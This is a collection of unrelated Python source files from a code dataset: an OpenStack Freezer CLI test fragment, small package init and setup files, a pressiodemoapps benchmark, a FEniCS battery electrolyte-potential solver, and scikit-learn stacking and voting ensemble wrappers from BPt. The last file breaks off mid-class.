        """Run *argstr* through a fresh ``FreezerShell``.

        stdout/stderr are captured and os.environ is scrubbed for the
        duration of the call.  ``expected_val`` is the exit code expected
        if the command raises SystemExit; ``check`` is unused but kept for
        interface compatibility.  Returns (stdout, stderr, options).
        """
        orig = (sys.stdout, sys.stderr)
        clean_env = {}
        _old_env, os.environ = os.environ, clean_env.copy()
        try:
            sys.stdout = io.StringIO()
            sys.stderr = io.StringIO()
            _shell = openstack_shell.FreezerShell()
            _shell.run(argstr.split())
        except SystemExit:
            exc_type, exc_value, exc_traceback = sys.exc_info()
            self.assertEqual(expected_val, exc_value.code)
        finally:
            stdout = sys.stdout.getvalue()
            stderr = sys.stderr.getvalue()
            sys.stdout.close()
            sys.stderr.close()
            sys.stdout, sys.stderr = orig
            os.environ = _old_env
        return stdout, stderr, _shell.options

    def test_help(self):
        required = 'usage:'
        help_text, stderr, _ = self.shell('help')
        self.assertThat(
            help_text,
            matchers.MatchesRegex(required))

    def test_help_on_subcommand(self):
        required = [
            '.*?^usage: .* job-list']
        stdout, stderr, _ = self.shell('help job-list')
        for r in required:
            self.assertThat(
                stdout,
                matchers.MatchesRegex(r, re.DOTALL | re.MULTILINE))

    def test_help_command(self):
        required = 'usage:'
        help_text, stderr, _ = self.shell('help action-create')
        self.assertThat(
            help_text,
            matchers.MatchesRegex(required))

    def test_run_incomplete_command(self):
        cmd = 'job-create'
        stdout, stderr, _ = self.shell(cmd, check=True, expected_val=2)
        search_str = "run job-create: error"
        self.assertTrue(any(search_str in string for string
                            in stderr.split('\n')))

    def test_set_os_backup_api_version(self):
        cmd = (
            '--os-backup-api-version 1 job-list')
        stdout, stderr, options = self.shell(cmd)
        self.assertEqual("1", options.os_backup_api_version)

    def test_default_os_backup_api_version(self):
        cmd = 'help job-list'
        stdout, stderr, options = self.shell(cmd)
        self.assertEqual("2", options.os_backup_api_version)

    def test_set_os_username_password(self):
        cmd = (
            '--os-username caihui --os-password stack job-list')
        stdout, stderr, options = self.shell(cmd)
        self.assertEqual("caihui", options.os_username)
        self.assertEqual("stack", options.os_password)

    def test_set_os_project_name_id(self):
        cmd = (
            '--os-project-id tecs0000000001 \
            --os-project-name tecs job-list')
        stdout, stderr, options = self.shell(cmd)
        self.assertEqual("tecs0000000001", options.os_project_id)
        self.assertEqual("tecs", options.os_project_name)

    def test_set_os_auth_url(self):
        cmd = (
            '--os-auth-url http://127.0.0.1:5001 job-list')
        stdout, stderr, options = self.shell(cmd)
        self.assertEqual("http://127.0.0.1:5001", options.os_auth_url)
| 1.84375 | 2 |
rekcurd_dashboard/logger/__init__.py | rekcurd/dashboard | 19 | 12772910 | <reponame>rekcurd/dashboard
# -*- coding: utf-8 -*-
from .logger_interface import SystemLoggerInterface
from .logger_jsonlogger import JsonSystemLogger
from .logger_fluent import FluentSystemLogger
logger = JsonSystemLogger()
| 1.070313 | 1 |
tests_perf/main.py | fnrizzi/pressio-demoapps | 2 | 12772911 | #!/usr/bin/env python
import pathlib, sys
file_path = pathlib.Path(__file__).parent.absolute()
from argparse import ArgumentParser
import numpy as np
import time
import pressiodemoapps as pda
def schemeStringToSchemeEnum(s):
    """Map a reconstruction-scheme name to the pressiodemoapps enum.

    Returns None for an unrecognized name (matching the original
    fall-through behavior).
    """
    name_to_enum = {
        "FirstOrder": pda.InviscidFluxReconstruction.FirstOrder,
        "Weno3": pda.InviscidFluxReconstruction.Weno3,
        "Weno5": pda.InviscidFluxReconstruction.Weno5,
    }
    return name_to_enum.get(s)
# ---------------------------
if __name__ == '__main__':
    # ---------------------------
    # Micro-benchmark driver: times repeated applyJacobian calls on a
    # 2D Euler periodic-smooth problem built from a user-supplied mesh.
    parser = ArgumentParser()
    # NOTE(review): "-m, --mesh" is a single option string containing a
    # comma and a space; presumably "-m"/"--mesh" were intended as two
    # separate flags -- verify how this parses before relying on it.
    parser.add_argument("-m, --mesh", dest="meshDir", default="empty")
    # Number of timing iterations.
    parser.add_argument("-n", dest="loopCount", default=10, type=int)
    # Reconstruction scheme name: FirstOrder, Weno3 or Weno5.
    parser.add_argument("-s", dest="scheme");
    args = parser.parse_args()
    start = time.time()
    meshPath = str(args.meshDir)
    meshObj = pda.load_cellcentered_uniform_mesh(meshPath)
    schemeEnum = schemeStringToSchemeEnum(args.scheme)
    probId = pda.Euler2d.PeriodicSmooth
    appObj = pda.create_problem(meshObj, probId, schemeEnum)
    yn = appObj.initialCondition()
    V = appObj.createVelocity()
    # Dense operand with 25 columns for the apply-Jacobian benchmark.
    B = np.ones((len(yn), 25), order='F')
    AJ = appObj.createApplyJacobianResult(B)
    # warmup
    appObj.applyJacobian(yn, 0., B, AJ)
    #appObj.velocity(yn, 0., V)
    print("starting loop")
    start = time.time()
    for i in range(args.loopCount):
        #appObj.velocity(yn, 0., V)
        appObj.applyJacobian(yn, 0., B, AJ)
    end = time.time()
    print("elapsed ", end - start)
tests/test_library.py | dtomlinson91/panaetius | 0 | 12772912 | import panaetius
def test_set_config(header, shared_datadir):
    """set_config should expose a top-level value from the config file."""
    # arrange: point the Config at the fixture directory without logging
    cfg = panaetius.Config(header, str(shared_datadir / "without_logging"))
    # act
    panaetius.set_config(cfg, "some_top_string")
    # assert
    assert cfg.some_top_string == "some_top_value"
| 2.203125 | 2 |
buildup/fenics_/phase2/coupled_phie.py | macklenc/mtnlion | 0 | 12772913 | <filename>buildup/fenics_/phase2/coupled_phie.py<gh_stars>0
import sys
import dolfin as fem
import matplotlib.pyplot as plt
import numpy as np
import sympy as sym
from buildup import common, utilities
from mtnlion.newman import equations
# NOTE: Deprecated
def picard_solver(a, lin, estimated, previous, bc, tol=1e-5, maxiter=25):
    """Fixed-point (Picard) iteration for a linearized variational problem.

    Repeatedly solves ``a == lin`` into ``estimated`` with boundary
    conditions ``bc``, stopping when the inf-norm of the change between
    successive iterates drops below ``tol`` or ``maxiter`` iterations
    have been performed.

    :param a: bilinear form (left-hand side).
    :param lin: linear form (right-hand side).
    :param estimated: Function receiving the current solve result.
    :param previous: Function holding the previous iterate; updated in place.
    :param bc: Dirichlet boundary condition(s) passed to fem.solve.
    :param tol: convergence tolerance on the inf-norm (was hard-coded 1e-5).
    :param maxiter: iteration cap (was hard-coded 25).
    """
    eps = 1.0
    # Renamed from `iter` to avoid shadowing the builtin.
    iteration = 0
    while eps > tol and iteration < maxiter:
        fem.solve(a == lin, estimated, bc)

        # Inf-norm of the change between successive iterates.
        diff = estimated.vector().get_local() - previous.vector().get_local()
        eps = np.linalg.norm(diff, ord=np.Inf)
        print("iter={}, norm={}".format(iteration, eps))

        # The new estimate becomes the reference for the next iteration.
        previous.assign(estimated)
        iteration += 1
def main():
    """Solve the electrolyte-potential (phie) equation at fixed COMSOL data.

    For each requested time, loads the COMSOL reference fields, assembles the
    phie variational form, solves it with a Picard iteration, and plots the
    result against the COMSOL reference. Returns 0 on success.
    """
    # Times at which to run solver; each entry is paired with t - dt so the
    # interleaved `time` list holds (previous, current) pairs.
    time_in = [0.1, 5, 9.9, 10, 10.1, 15, 20]
    dt = 0.1
    time = [None] * (len(time_in) * 2)
    time[::2] = [t - dt for t in time_in]
    time[1::2] = time_in

    # Applied current: +1C charge on [10, 20], -1C discharge on [30, 40].
    I_1C = 20.5
    Iapp = [I_1C if 10 <= i <= 20 else -I_1C if 30 <= i <= 40 else 0 for i in time]

    # Collect common data
    cmn = common.Common(time)
    domain = cmn.domain
    comsol = cmn.comsol_solution

    k_norm_ref, csmax, alpha, L, a_s, sigma_eff = common.collect(
        cmn.fenics_params, "k_norm_ref", "csmax", "alpha", "L", "a_s", "sigma_eff"
    )
    F, R, Tref, ce0, Acell = common.collect(cmn.fenics_consts, "F", "R", "Tref", "ce0", "Acell")
    Lc, a_s, eps_e, sigma_eff, brug_kappa = common.collect(
        cmn.fenics_params, "L", "a_s", "eps_e", "sigma_eff", "brug_kappa"
    )
    F, t_plus, R, T = common.collect(cmn.fenics_consts, "F", "t_plus", "R", "Tref")

    # Symbolic conductivity: substitute the spatial symbol with `ce`.
    x = sym.Symbol("ce")
    y = sym.Symbol("x")
    kp = cmn.fenics_consts.kappa_ref.subs(y, x)

    dfdc = sym.Symbol("dfdc")
    # dfdc = 0
    kd = fem.Constant(2) * R * T / F * (fem.Constant(1) + dfdc) * (t_plus - fem.Constant(1))
    kappa_D = fem.Expression(sym.printing.ccode(kd), dfdc=0, degree=1)

    V = domain.V
    v = fem.TestFunction(V)
    du = fem.TrialFunction(V)

    # Fields loaded from the COMSOL reference at each time step.
    cse_f = fem.Function(V)
    ce_f = fem.Function(V)
    phis_f = fem.Function(V)
    jbar = fem.Function(V)
    phie_f = fem.Function(V)  # "previous solution"
    phie = fem.Function(V)  # "previous solution"

    kappa_ref = fem.Expression(sym.printing.ccode(kp), ce=ce_f, degree=1)
    kappa_eff = kappa_ref * eps_e ** brug_kappa
    kappa_Deff = kappa_D * kappa_ref * eps_e

    Uocp = equations.Uocp(cse_f, **cmn.fenics_params)
    j = equations.j(
        ce_f, cse_f, phie_f, phis_f, Uocp, csmax, ce0, alpha, k_norm_ref, F, R, Tref, dm=domain.domain_markers
    )

    # phie(jbar, ce, phie, v, dx, L, a_s, F, kappa_eff, kappa_Deff, ds=0, neumann=0, nonlin=False, **kwargs):
    u = fem.TrialFunction(V)
    v = fem.TestFunction(V)
    lhs, rhs = equations.phie(j, ce_f, u, v, kappa_eff, kappa_Deff, **cmn.fenics_params, **cmn.fenics_consts)
    phie_form = (lhs - rhs) * domain.dx

    # initialize matrix to save solution results
    u_array = np.empty((len(time_in), len(comsol.mesh)))
    u_array2 = np.empty((len(time_in), len(comsol.mesh)))

    k = 0
    for i in range(len(time_in)):
        i_1 = i * 2  # previous time step (currently unused)
        i = i * 2 + 1  # current time step

        # Load the COMSOL reference fields for the current time.
        cse_f.vector()[:] = comsol.data.cse[i][fem.dof_to_vertex_map(V)].astype("double")
        ce_f.vector()[:] = comsol.data.ce[i][fem.dof_to_vertex_map(V)].astype("double")
        phie_f.vector()[:] = comsol.data.phie[i][fem.dof_to_vertex_map(V)].astype("double")
        phis_f.vector()[:] = comsol.data.phis[i][fem.dof_to_vertex_map(V)].astype("double")
        jbar.vector()[:] = comsol.data.j[i][fem.dof_to_vertex_map(V)].astype("double")

        # Pin phie at the left boundary to the COMSOL value.
        bc = [fem.DirichletBC(V, comsol.data.phie[i, 0], domain.boundary_markers, 1)]

        Feq = phie_form
        # fem.solve(fem.lhs(Feq) == fem.rhs(Feq), phie_f, bc)
        phie.assign(phie_f)
        picard_solver(fem.lhs(Feq), fem.rhs(Feq), phie_f, phie, bc)

        # J = fem.derivative(Feq, phie_f, du)
        # problem = fem.NonlinearVariationalProblem(Feq, phis_f, bc, J)
        # solver = fem.NonlinearVariationalSolver(problem)
        #
        # prm = solver.parameters
        # prm['newton_solver']['absolute_tolerance'] = 1e-8
        # prm['newton_solver']['relative_tolerance'] = 1e-7
        # prm['newton_solver']['maximum_iterations'] = 25
        # prm['newton_solver']['relaxation_parameter'] = 1.0
        # solver.solve()

        u_array[k, :] = phie_f.vector().get_local()[fem.vertex_to_dof_map(domain.V)]
        u_array2[k, :] = fem.interpolate(j, V).vector().get_local()[fem.vertex_to_dof_map(V)]
        k += 1

    d = dict()
    d["x"] = comsol.mesh
    d["ce"] = comsol.data.ce[1::2]
    d["cse"] = comsol.data.cse[1::2]
    d["phie"] = u_array
    d["phis"] = comsol.data.phis[1::2]
    neg_params = {k: v[0] if isinstance(v, np.ndarray) else v for k, v in cmn.params.items()}
    d = dict(d, **neg_params)

    # Renamed from `filter` to avoid shadowing the builtin.
    def region_filter(x, sel="neg"):
        """Slice a value down to the negative or positive electrode region."""
        # BUG FIX: the original compared with `sel is "neg"`, an identity
        # check against a string literal; use equality instead.
        if sel == "neg":
            ind0 = 0
            ind1 = cmn.comsol_solution.neg_ind
        else:
            ind0 = 2
            ind1 = cmn.comsol_solution.pos_ind

        if isinstance(x, list):
            return x[ind0]

        if isinstance(x, np.ndarray):
            if len(x.shape) > 1:
                return x[:, ind1]
            return x[ind1]
        return x

    neg = dict(map(lambda x: (x[0], region_filter(x[1], "neg")), d.items()))
    # dta = equations.eval_j(**neg, **cmn.consts)

    utilities.report(comsol.mesh, time_in, u_array, comsol.data.phie[1::2], "$\Phi_e$")
    plt.show()

    # utilities.report(comsol.neg, time_in, dta,
    #                  comsol.data.j[:, comsol.neg_ind][1::2], '$j^{neg}$')
    # plt.show()
    utilities.report(
        comsol.pos, time_in, u_array2[:, comsol.pos_ind], comsol.data.j[:, comsol.pos_ind][1::2], "$j^{pos}$"
    )
    plt.show()
    return 0


if __name__ == "__main__":
    sys.exit(main())
| 2.296875 | 2 |
naszrzecznik2/signatures/apps.py | watchdogpolska/naszrzecznik2 | 0 | 12772914 | <reponame>watchdogpolska/naszrzecznik2
from __future__ import unicode_literals
from django.apps import AppConfig
class SignaturesConfig(AppConfig):
    """Django application configuration for the ``signatures`` app."""
    name = 'signatures'
| 1.148438 | 1 |
build/lib/ctrlengine/filters/__init__.py | 0xJeremy/ctrl.engine | 3 | 12772915 | from .simple_moving_average import simple_moving_average
simple_moving_average = simple_moving_average
from .exponentially_weighted_moving_average import exponentially_weighted_moving_average
exponentially_weighted_moving_average = exponentially_weighted_moving_average
| 1.4375 | 1 |
setup.py | guilledk/triopatterns | 12 | 12772916 | <filename>setup.py
#!/usr/bin/env python3
from setuptools import setup, find_packages
# Packaging metadata for the `triopatterns` library.
setup(
    name="triopatterns",
    packages=find_packages(),
    version="0.1.0",
    description="Useful async patterns I repeat everywere when using trio.",
    # Runtime dependency: the trio async framework.
    install_requires=[
        "trio"
    ]
)
| 1.359375 | 1 |
BPt/pipeline/ensemble_wrappers.py | sahahn/ABCD_ML | 1 | 12772917 |
from copy import deepcopy
from .helpers import set_n_jobs, replace_with_in_params
from sklearn.ensemble import (StackingRegressor, StackingClassifier,
VotingClassifier, VotingRegressor)
from joblib import Parallel, delayed
from sklearn.base import clone, is_classifier
from sklearn.utils import Bunch
from sklearn.model_selection import check_cv, cross_val_predict
import numpy as np
import pandas as pd
from .base import _fit_single_estimator, _get_est_fit_params
from ..main.CV import BPtCV
from sklearn.utils.validation import check_is_fitted
from sklearn.utils.multiclass import check_classification_targets
from sklearn.utils.metaestimators import available_if, if_delegate_has_method
from sklearn.preprocessing import LabelEncoder
from .helpers import (get_mean_fis, get_concat_fis, get_concat_fis_len,
check_for_nested_loader, get_nested_final_estimator)
def _fit_all_estimators(self, X, y, sample_weight=None, mapping=None,
                        fit_index=None):
    """Fit every base estimator in parallel and record them on ``self``.

    Sets ``self.estimators_`` (fitted clones, 'drop' entries excluded) and
    ``self.named_estimators_`` (name -> fitted estimator or 'drop').
    Returns the ``(names, all_estimators)`` pair from validation.
    """
    # Validate
    names, all_estimators = self._validate_estimators()

    # Fit all estimators
    self.estimators_ = Parallel(n_jobs=self.n_jobs)(
        delayed(_fit_single_estimator)(clone(est), X, y, sample_weight,
                                       mapping, fit_index)
        for est in all_estimators if est != 'drop'
    )

    # Rebuild the name -> fitted-estimator mapping. Because 'drop' entries
    # were skipped above, a separate running index tracks the position in
    # the (shorter) fitted list.
    self.named_estimators_ = Bunch()
    est_fitted_idx = 0
    for name_est, org_est in zip(names, all_estimators):
        if org_est != 'drop':
            self.named_estimators_[name_est] = self.estimators_[
                est_fitted_idx]
            est_fitted_idx += 1
        else:
            self.named_estimators_[name_est] = 'drop'

    return names, all_estimators
def voting_fit(self, X, y, sample_weight=None, mapping=None,
               fit_index=None, **kwargs):
    """Fit every base estimator on the full data set.

    Voting ensembles have no meta-learner, so fitting reduces to training
    each sub-estimator; extra ``**kwargs`` are accepted for interface
    compatibility and ignored.
    """
    # All the work is delegated to the shared estimator-fitting helper.
    self._fit_all_estimators(X, y,
                             sample_weight=sample_weight,
                             mapping=mapping,
                             fit_index=fit_index)
    return self
def _get_cv_inds(self, index):
    """Resolve ``self.cv`` into something sklearn's check_cv understands."""
    # BPt's own CV object must first be converted to explicit indices.
    if isinstance(self.cv, BPtCV):
        return self.cv.get_cv(fit_index=index,
                              random_state=getattr(self, 'random_state', None),
                              return_index=True)

    # Anything else is treated as a plain sklearn cv argument.
    return self.cv
def stacking_fit(self, X, y, sample_weight=None, mapping=None,
                 fit_index=None, **kwargs):
    """Fit base estimators on all data and the final estimator on their
    cross-validated predictions (BPt-aware variant of sklearn stacking)."""
    # Validate final estimator
    self._validate_final_estimator()

    # Fit self.estimators_ on all data
    names, all_estimators = self._fit_all_estimators(
        X, y, sample_weight=sample_weight, mapping=mapping,
        fit_index=fit_index)

    # To train the meta-classifier using the most data as possible, we use
    # a cross-validation to obtain the output of the stacked estimators.
    # Get cv inds w/ handle cases for BPtCV
    cv_inds = self._get_cv_inds(fit_index)

    # To ensure that the data provided to each estimator are the same, we
    # need to set the random state of the cv if there is one and we need to
    # take a copy.
    cv = check_cv(cv_inds, y=y, classifier=is_classifier(self))
    if hasattr(cv, 'random_state') and cv.random_state is None:
        cv.random_state = np.random.RandomState()

    # Proc stack method: resolve 'auto' / method name per estimator.
    stack_method = [self.stack_method] * len(all_estimators)
    self.stack_method_ = [
        self._method_name(name, est, meth)
        for name, est, meth in zip(names, all_estimators, stack_method)
    ]

    # Base fit params for sample weight
    sample_weight_params = ({"sample_weight": sample_weight}
                            if sample_weight is not None else None)

    # Get the fit params for each indv estimator
    all_fit_params = [_get_est_fit_params(est, mapping=mapping,
                                          fit_index=fit_index,
                                          other_params=sample_weight_params)
                      for est in all_estimators]

    # Catch rare error - TODO come up with fix
    if X.shape[0] == X.shape[1]:
        raise RuntimeError('Same numbers of data points and ',
                           'features can lead to error.')

    # Make the cross validated internal predictions to train
    # the final_estimator
    predictions = Parallel(n_jobs=self.n_jobs)(
        delayed(cross_val_predict)(clone(est), X, y, cv=deepcopy(cv),
                                   method=meth, n_jobs=self.n_jobs,
                                   fit_params=fit_params,
                                   verbose=self.verbose)
        for est, meth, fit_params in zip(all_estimators,
                                         self.stack_method_,
                                         all_fit_params) if est != 'drop'
    )

    # Only not None or not 'drop' estimators will be used in transform.
    # Remove the None from the method as well.
    self.stack_method_ = [
        meth for (meth, est) in zip(self.stack_method_, all_estimators)
        if est != 'drop'
    ]

    # @TODO make sure train data index is concatenated correctly
    X_meta = self._concatenate_predictions(X, predictions)
    _fit_single_estimator(self.final_estimator_, X_meta, y,
                          sample_weight=sample_weight,
                          mapping=None,
                          fit_index=fit_index)

    return self
def ensemble_classifier_fit(self, X, y,
                            sample_weight=None, mapping=None,
                            fit_index=None, **kwargs):
    """Classifier fit wrapper: label-encode y, then run the BPt fit.

    Stores the fitted LabelEncoder on both ``self._le`` and ``self.le_``
    so the Voting and Stacking code paths can each find it.
    """
    check_classification_targets(y)

    # To make compatible with each Voting and Stacking ...
    self._le = LabelEncoder().fit(y)
    self.le_ = self._le
    self.classes_ = self._le.classes_

    # Fit on the integer-encoded targets; predictions are inverse
    # transformed back to the original labels at predict time.
    transformed_y = self._le.transform(y)

    return self.bpt_fit(X, transformed_y,
                        sample_weight=sample_weight,
                        mapping=mapping,
                        fit_index=fit_index,
                        **kwargs)
def _base_transform_feat_names(self, X_df, encoders=None, nested_model=False):
'''This base functions works under the assumption of calculating
mean coef's.'''
# Check each sub estimator for the method
# transform feat names
all_feat_names = []
for est in self.estimators_:
if hasattr(est, 'transform_feat_names'):
feat_names = est.transform_feat_names(X_df, encoders=encoders,
nested_model=nested_model)
all_feat_names.append(feat_names)
# If None found
if len(all_feat_names) == 0:
return list(X_df)
# If some found, only return updated if all the same
# So check if all same as first
# if any not the same, return base
for fn in all_feat_names[1:]:
if fn != all_feat_names[0]:
return list(X_df)
# Otherwise, return first
return all_feat_names[0]
def _loader_transform_feat_names(self, X_df, encoders=None, nested_model=False):
# Check each estimator
all_feat_names = []
for est in self.estimators_:
if hasattr(est, 'transform_feat_names'):
feat_names = est.transform_feat_names(X_df, encoders=encoders,
nested_model=nested_model)
all_feat_names.append(feat_names)
# If none found
if len(all_feat_names) == 0:
return list(X_df)
# Get concat list
all_concat = list(np.concatenate(all_feat_names))
# If all unique, return concat
if len(set(all_concat)) == len(all_concat):
return all_concat
# Otherwise, append unique identifier
all_concat = []
for i, fn in enumerate(all_feat_names):
all_concat += [str(i) + '_' + str(name) for name in fn]
return all_concat
def _transform_feat_names(self, X_df, encoders=None, nested_model=False):
if self.has_nested_loader():
return self._loader_transform_feat_names(X_df, encoders=encoders, nested_model=nested_model)
else:
return self._base_transform_feat_names(X_df, encoders=encoders, nested_model=nested_model)
def _get_fis_lens(self):
'''This method is used in loader version of voting ensembles'''
# If already stored as attribute, use that
if hasattr(self, 'concat_est_lens_'):
return getattr(self, 'concat_est_lens_')
# Try coef
fi_len = get_concat_fis_len(self.estimators_, 'coef_')
if fi_len is not None:
return fi_len
# Then feature importances
fi_len = get_concat_fis_len(self.estimators_, 'feature_importances_')
if fi_len is not None:
return fi_len
# TODO - could do a search in each base estimator to try and determine
# the final n features in ?
return None
def base_inverse_transform_fis(self, fis, avg_method):
    """Map feature importances back through each estimator's loader, then
    combine the per-estimator results with ``avg_method``.

    ``fis`` is a pandas Series of importances aligned with the concatenated
    transformed features; ``avg_method`` takes a DataFrame (one row per
    estimator) and returns one aggregated row.
    """
    # If not loader, return as is
    if not self.has_nested_loader():
        return fis

    # Get underlying lengths
    concat_fi_lens_ = self._get_fis_lens()
    if concat_fi_lens_ is None:
        return fis

    # Go through and inverse transform each chunk
    fi_chunks, ind = [], 0
    for est, l in zip(self.estimators_, concat_fi_lens_):

        # If any don't have it, return passed original
        if not hasattr(est, 'inverse_transform_fis'):
            return fis

        # Append the inverse transformed chunk
        fi_chunks.append(est.inverse_transform_fis(fis.iloc[ind:ind+l]))
        ind += l

    # Combine together in DataFrame
    fi_df = pd.DataFrame(fi_chunks)
    avg = avg_method(fi_df)

    # Put back together in series, and return that
    return pd.Series(avg, index=list(fi_df))
def voting_inverse_transform_fis(self, fis):
    """Inverse transform feature importances, averaging chunks by mean."""
    # Voting ensembles weight every estimator equally, so a plain
    # column-wise mean is the right aggregation.
    return self.base_inverse_transform_fis(
        fis, lambda fi_df: np.mean(np.array(fi_df), axis=0))
def _get_estimator_fi_weights(estimator):
weights = None
if hasattr(estimator, 'coef_'):
weights = getattr(estimator, 'coef_')
if weights is None and hasattr(estimator, 'feature_importances_'):
weights = getattr(estimator, 'feature_importances_')
if weights is None:
return None
# Set to absolute
weights = np.abs(weights)
# Shape if not 1D is (1, n_features) or (n_classes, n_features)
# TODO handle multiclass
if len(np.shape(weights)) > 1:
weights = weights[0]
return weights
def stacking_inverse_transform_fis(self, fis):
    """Inverse transform feature importances for a stacking ensemble,
    weighting each base estimator by the final estimator's importances."""

    def stacked_avg(fi_df):
        # First assumption we need to make is that we
        # are only interested in absolute values
        fis = np.abs(np.array(fi_df))

        # Use coef / feat importance from estimator as weights
        weights = _get_estimator_fi_weights(self.final_estimator_)
        if weights is None:
            return None

        # Return weighted average; if all weights are zero np.average
        # raises ZeroDivisionError, so fall back to the plain mean.
        try:
            return np.average(fis, axis=0, weights=weights)
        except ZeroDivisionError:
            return np.average(fis, axis=0)

    return self.base_inverse_transform_fis(fis, stacked_avg)
def has_nested_loader(self):
    """Lazily compute and cache whether any sub-estimator wraps a loader."""
    # Only probe the estimators once; the answer is cached on the instance.
    if not hasattr(self, 'nested_loader_'):
        self.nested_loader_ = check_for_nested_loader(self.estimators_)
    return self.nested_loader_
def ensemble_transform(self, X):
    """Concatenate each sub-estimator's nested-model transform of X.

    Also records the per-estimator output widths in
    ``self.concat_est_lens_`` so later prediction code can split the
    concatenated array back into chunks.
    """
    if not self.has_nested_loader():
        # TODO - non nested loader case, but still nested model case
        raise RuntimeError('Not implemented.')

    transformed = []
    self.concat_est_lens_ = []
    for est in self.estimators_:
        # Pass nested_model=True down to each estimator's transform.
        Xt = est.transform(X, nested_model=True)
        transformed.append(Xt)
        self.concat_est_lens_.append(Xt.shape[-1])

    # Stack the per-estimator outputs side by side.
    return np.concatenate(transformed, axis=1)
def _get_estimators_pred_chunks(self, X, method='predict'):
    """Call ``method`` on each estimator's final model over its own chunk.

    X is assumed to be the concatenation of the per-estimator transformed
    features (widths in ``self.concat_est_lens_``); ``method`` may be a
    single name or one name per estimator.
    """
    # Normalize to one method name per estimator.
    methods = (method if isinstance(method, list)
               else [method] * len(self.estimators_))

    preds, start = [], 0
    for est, width, meth in zip(self.estimators_,
                                self.concat_est_lens_,
                                methods):
        # Skip past the nested wrappers to the actual fitted model.
        final_est = get_nested_final_estimator(est)

        # Predict on just this estimator's slice of columns.
        preds.append(getattr(final_est, meth)(X[:, start:start + width]))
        start += width

    return np.asarray(preds)
def _stacked_classifier_predict(self, X, method, **predict_params):
    """Run a stacking classifier's ``method`` on loader-transformed input.

    X is expected to be the concatenated nested-model transform of the
    base estimators; their stacked outputs feed the final estimator.
    """
    check_is_fitted(self)

    # Nested loader case
    if self.has_nested_loader():

        # Get predict probas from each
        predict_probas = self._get_estimators_pred_chunks(X, method=self.stack_method_)
        concat_preds = self._concatenate_predictions(X, predict_probas)

        # Make preds with final estimator on concat preds
        y_pred = getattr(self.final_estimator_, method)(concat_preds)

        # If predict, cast to inverse transform
        if method == 'predict':
            y_pred = self._le.inverse_transform(y_pred)

        return y_pred

    # TODO finish other case for stacked classifier
    raise RuntimeError('Not Implemented')
class BPtStackingRegressor(StackingRegressor):
    """StackingRegressor extended with BPt mapping / fit-index support and
    a nested-loader prediction path."""

    # Flags telling the BPt pipeline which extra fit arguments to pass.
    _needs_mapping = True
    _needs_fit_index = True

    # Methods shared with the other BPt ensemble classes are defined at
    # module level and attached here.
    _fit_all_estimators = _fit_all_estimators
    fit = stacking_fit
    _get_cv_inds = _get_cv_inds

    has_nested_loader = has_nested_loader
    transform_feat_names = _transform_feat_names
    _base_transform_feat_names = _base_transform_feat_names
    _loader_transform_feat_names = _loader_transform_feat_names

    _get_fis_lens = _get_fis_lens
    inverse_transform_fis = stacking_inverse_transform_fis
    base_inverse_transform_fis = base_inverse_transform_fis
    _get_estimators_pred_chunks = _get_estimators_pred_chunks
    ensemble_transform = ensemble_transform

    @property
    def feature_importances_(self):
        # Only defined for the nested-loader case; otherwise returns None.
        if self.has_nested_loader():
            return get_concat_fis(self.estimators_, 'feature_importances_')

        # TODO - average according to stacked ...

    @property
    def coef_(self):
        # Only defined for the nested-loader case; otherwise returns None.
        if self.has_nested_loader():
            return get_concat_fis(self.estimators_, 'coef_')

        # TODO - average according to stacked ...

    def transform(self, X, nested_model=False):
        # Not nested, base case transform
        if not nested_model:
            return super().transform(X)

        return self.ensemble_transform(X)

    def predict(self, X):
        # Base case is when number of features stays the same as expected.
        if X.shape[-1] == self.n_features_in_:
            return super().predict(X)

        check_is_fitted(self)

        # Nested loader case
        if self.has_nested_loader():

            # If nested loader, then the expectation is that this
            # predict is receiving the concat fully model nested transformed
            # output from each of the self.estimators_
            pred_chunks = self._get_estimators_pred_chunks(X, method='predict').T

            # Return predictions from final estimator
            return self.final_estimator_.predict(pred_chunks)

        # TODO fill in other case?
        raise RuntimeError('Not Implemented')
class BPtStackingClassifier(StackingClassifier):
    """StackingClassifier extended with BPt mapping / fit-index support and
    a nested-loader prediction path."""

    # Flags telling the BPt pipeline which extra fit arguments to pass.
    _needs_mapping = True
    _needs_fit_index = True

    # `fit` wraps the stacking fit with label encoding (classifier case).
    _fit_all_estimators = _fit_all_estimators
    bpt_fit = stacking_fit
    fit = ensemble_classifier_fit
    _get_cv_inds = _get_cv_inds

    has_nested_loader = has_nested_loader
    transform_feat_names = _transform_feat_names
    _base_transform_feat_names = _base_transform_feat_names
    _loader_transform_feat_names = _loader_transform_feat_names

    _get_fis_lens = _get_fis_lens
    inverse_transform_fis = stacking_inverse_transform_fis
    base_inverse_transform_fis = base_inverse_transform_fis
    _get_estimators_pred_chunks = _get_estimators_pred_chunks
    ensemble_transform = ensemble_transform
    _stacked_classifier_predict = _stacked_classifier_predict

    @property
    def feature_importances_(self):
        # Only defined for the nested-loader case; otherwise returns None.
        if self.has_nested_loader():
            return get_concat_fis(self.estimators_, 'feature_importances_')

        # TODO - average according to stacked ...

    @property
    def coef_(self):
        # Only defined for the nested-loader case; otherwise returns None.
        if self.has_nested_loader():
            return get_concat_fis(self.estimators_, 'coef_')

        # TODO - average according to stacked ...

    def transform(self, X, nested_model=False):
        # Not nested, base case transform
        if not nested_model:
            return super().transform(X)

        return self.ensemble_transform(X)

    @if_delegate_has_method(delegate="final_estimator_")
    def predict(self, X, **predict_params):
        # Base case: input width matches what fit saw.
        if X.shape[-1] == self.n_features_in_:
            return super().predict(X, **predict_params)

        # Other case: loader-transformed concatenated input.
        return self._stacked_classifier_predict(X, method='predict', **predict_params)

    @if_delegate_has_method(delegate="final_estimator_")
    def predict_proba(self, X):
        # Base case
        if X.shape[-1] == self.n_features_in_:
            return super().predict_proba(X)

        # Other case
        return self._stacked_classifier_predict(X, method='predict_proba')

    @if_delegate_has_method(delegate="final_estimator_")
    def decision_function(self, X):
        # Base case
        if X.shape[-1] == self.n_features_in_:
            return super().decision_function(X)

        # Other case
        return self._stacked_classifier_predict(X, method='decision_function')
class BPtVotingRegressor(VotingRegressor):
    """VotingRegressor extended with BPt mapping / fit-index support and
    a nested-loader prediction path."""

    # Set tags
    _needs_mapping = True
    _needs_fit_index = True

    # Override / set methods
    _fit_all_estimators = _fit_all_estimators
    fit = voting_fit

    has_nested_loader = has_nested_loader
    transform_feat_names = _transform_feat_names
    _base_transform_feat_names = _base_transform_feat_names
    _loader_transform_feat_names = _loader_transform_feat_names

    _get_fis_lens = _get_fis_lens
    inverse_transform_fis = voting_inverse_transform_fis
    base_inverse_transform_fis = base_inverse_transform_fis
